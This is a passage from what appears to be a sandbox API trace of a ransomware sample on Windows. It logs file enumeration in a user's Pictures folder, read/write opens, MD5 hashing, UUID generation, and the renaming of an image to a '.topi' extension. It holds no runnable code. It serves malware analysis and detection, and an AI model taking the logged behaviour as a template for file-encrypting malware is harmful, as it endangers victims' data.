szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.808] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.808] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.808] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.808] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.808] GetLastError () returned 0x0 [0096.808] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.808] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.808] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.808] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.808] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x17ef0) returned 0x9a06a00 [0096.809] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02d38 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b08 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02d80 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b50 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b68 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.809] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b50 | out: hHeap=0x680000) returned 1 [0096.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b68 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4b50 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b50 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.810] GetCurrentThreadId () returned 0x8c4 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f87c0 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.810] GetCurrentThreadId () returned 0x8c4 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b50 [0096.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b68 [0096.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b38 [0096.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.829] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\x0jUCkTsXZflk5KCqd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\x0jucktsxzflk5kcqd.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\x0jUCkTsXZflk5KCqd.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\x0jucktsxzflk5kcqd.jpg.topi")) returned 1 [0096.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.830] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.831] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79deee10, ftCreationTime.dwHighDateTime=0x1d5c4b7, ftLastAccessTime.dwLowDateTime=0x27872d60, ftLastAccessTime.dwHighDateTime=0x1d5be4c, ftLastWriteTime.dwLowDateTime=0x27872d60, ftLastWriteTime.dwHighDateTime=0x1d5be4c, nFileSizeHigh=0x0, nFileSizeLow=0x134a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z- 5l9YOa-U25M88Ec9Y.gif", cAlternateFileName="Z-5L9Y~1.GIF")) returned 1 [0096.831] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\Z- 5l9YOa-U25M88Ec9Y.gif") returned=".gif" [0096.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\Z- 5l9YOa-U25M88Ec9Y.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\z- 5l9yoa-u25m88ec9y.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.832] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=79008) returned 1 [0096.832] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.835] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1347a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.835] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.836] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.837] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.837] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.837] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.837] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.837] GetLastError () returned 0x0 [0096.837] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.837] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.837] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.837] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.837] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x134a0) returned 0x9a06a00 [0096.838] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02d80 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02dc8 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b38 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b68 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b80 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.838] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b80 | out: hHeap=0x680000) returned 1 [0096.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b80 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4b68 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b80 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.839] GetCurrentThreadId () returned 0x8c4 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8850 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.839] GetCurrentThreadId () returned 0x8c4 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b68 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b80 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b50 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) 